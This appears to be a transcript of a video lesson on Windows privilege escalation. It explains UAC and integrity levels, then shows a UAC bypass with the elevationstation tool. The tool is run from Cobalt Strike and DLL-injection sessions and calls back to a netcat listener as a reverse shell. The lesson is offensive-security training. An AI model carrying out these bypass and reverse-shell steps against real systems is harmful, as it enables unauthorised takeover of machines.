Hey guys, welcome to another video. So we are in the one of the important section. It's a privilege escalation. So if you coming about the privilege escalation, um, so the privilege escalation is like we are in a user privilege, but we need to execute. We need to do more stuff. Uh, to do that, you need to jump onto the administrator level, right? Administrator or a system level of privilege. Okay. So if you are in a some user level privilege, you could not have enough access to get the things sorted. Okay, the first point, let me show you a few things with an example. Let me open my command prompt in a normal way and I will give this command. Let me execute this. You can see I just this is the commands to enable the RDP, remote desktop connection. Okay, so now it was saying error access is denied because I do not have enough access because I was in a normal privilege. So you can see I have a medium mandatory level privilege, but I am in a local administrator and member of administrator group. Okay, so I was in the administrator group, but my privilege was a medium, just a user privilege. So I could not able to modify the registry or creating any persistent services and anything. Okay, so let me open the command prompt in administrator mode. I will open this as administrator mode and I will execute this command. So now you can see the operation has been completed successfully. Okay, because we are in administrator level privilege. So here you can find the difference between both of the user and administrator privilege. So here, let we will see this. Okay. Here you can see the high mandatory level. It's an administrator level, and anyway, the member is part of an administrator group. He is the user, and both are the similar user. Okay. So Windows has any if you taking the Windows 10, Windows 11, or any Windows based machines. So the Windows created a separate function called the UAC. Okay, UAC means as a user access control. When I give the CMD and if I right click on if I give right click, so it was asking on terminal, right? It was asking on permission. So you can see here user account control. Okay, so if I click on the else, it will load my terminal as a administrator level. Okay. So the Windows manufacturer, they created this for a security reason because when you downloading any malicious file from the internet, so if you executing that file, so directly that if the UAC, if the Windows do not support the UAC features, so when you are executing any file, it will be executed under the administrator rights, right? So the malware can able to get more access comparing to the medium mandatory. So they splitted the privilege medium mandatory level, high mandatory level, and all. So if you needs to go to the administrator level, you have to click on if you any application. Okay, let me take a task manager run as an administrator. Okay, so for any application, use the Windows will ask you whether this program can be opened in administrator mode or it's okay with the normal mode. Okay, so when you double click on any of the application, it will be normally loaded as a medium mandatory level, as a user level. But if you right click on this and run as an administrator, it will run as an administrator level. Okay, so this is the difference between both of the both of the console. Here you can find some information. It's a privileges information. So here you can see we have only a less privilege, but here you can find a lot of options when comparing to the medium mandatory level. So if you need to execute any commands, any sort of things, if you need to perform any kind of big operation in the Windows operating system, you needs to be in a administrator level of privilege, right? So do let me give you one more example. I will be opening this process explorer as a run as a administrator. Let me show you some interesting part. Let me filter it the CMD. So we know there is a two CMD has been open. One is a normal and one is administrator mode. Let me click on the properties and here you can find built-in administrator, it's Denny flag. And let me go to another CMD, and let me show you that. So here you can find it's administrator mode command prompt. So it was showing the built-in administrator. He is a owner of that, and built-in administrator it's a Denny. Okay, so that you can find the 8252. This one it's a normal, medium, mandatory level, user level command prompt, and this is administrator level command prompt. Okay, so if you want to do some privilege escalation, so in the simple way you can go and bypass the UAC. So we know this user already has a this already in a this user was already in a part of the local administrator group, right? He's already in a local administrator group, so you can easily elevate the privilege, elevate the user access account control policy. Okay, so the by mean this one. Okay, you can simply elevate this. Okay, so I was using one of the tool called elevationstation.exe for this. That was a simple tool, you can easily get it from Google. So let me tell you how to get that. So click on this and go to the elevation station, this one. So go to the elevation station.exe, click on this and download the file. Okay, that's all. You don't need to do any other things to perform this operation. Okay, let me. I have already downloaded it and I saved that as a elevation. So this is my file. Let me open the. Okay, we will go by one by one. Um I'll show you how to get onto this. We are in the Cobalt Strike. Let's execute our normal payload, which we have created that before. We'll get onto interact session. You can execute this payload in many ways. Okay, you can go for a DLL injection and you can execute from there. You can put the elevation station in the Kali machine and you can upload it into the Windows machine. So that belongs to you. Maybe we complete a lot of sections. You will be having a different set of ideas to how to deliver this elevation station into the Windows machine. So I will be I am not using download. I'm not uploading or anything. I'll just directly executing that. Let me check which folder we are in, because our elevation station it was in the downloads folder as a name as a elevation. We'll use that. So we are in the C user folder. Let me go to download folders. So we'll wait for some time. Let the program will get executed. Let me open any other port if you need. You can open any port. I'll be opening LEP 8678. This support which I am opening. So that's completely belongs to you. Elevation. So this is our tool name, UAC dash UAC. Okay. So you need to give the local host 192.168.18.27, and you have to give the port here. The port which we have opened, it says 8678. So let me give the port here, 8678. Let me execute this. Oh, okay. So we need to give the shell command before. because we are executing in a CMD, right? So shell elevation dash UAC 8678. Let we will see whether we will getting the reverse connection or not. We need to wait for a few seconds. It will take some time. You can see I got a reverse connection. So if I check the privilege now, who am I slash all. So here you can find we are in a high mandatory level. You can do anything from this privilege, right? So this is the way you can easily bypass the um, user access control. Okay, I have used the cobalt stick. If you need, you can go to another way. Let me cancel this, and I'll be opening the similar port. In this time we will execute the DLL injection, which we have created before. We got a session. I feel it was in a okay, it's in a medium mandatory level, so no problem. Let's redirect to see users slash user slash downloads. So elevation dash UAC 192.168.18.27. You need to give the calling machine IP and 8567. So this is the port which I am using. So at that time I will be opening a new port at cat LVP 8567 8567. Yeah, let's execute the payload. Let me execute this one more time. It was not completed. I didn't get the 8567. I didn't get the reverse connection from that port. I feel the connection will be terminated because unfortunately I have deleted that. So no problem. We already know how to deliver this payload and how to do the privilege escalation. We'll hop off this video and we'll continue our discussion in next video. See you guys. Bye bye.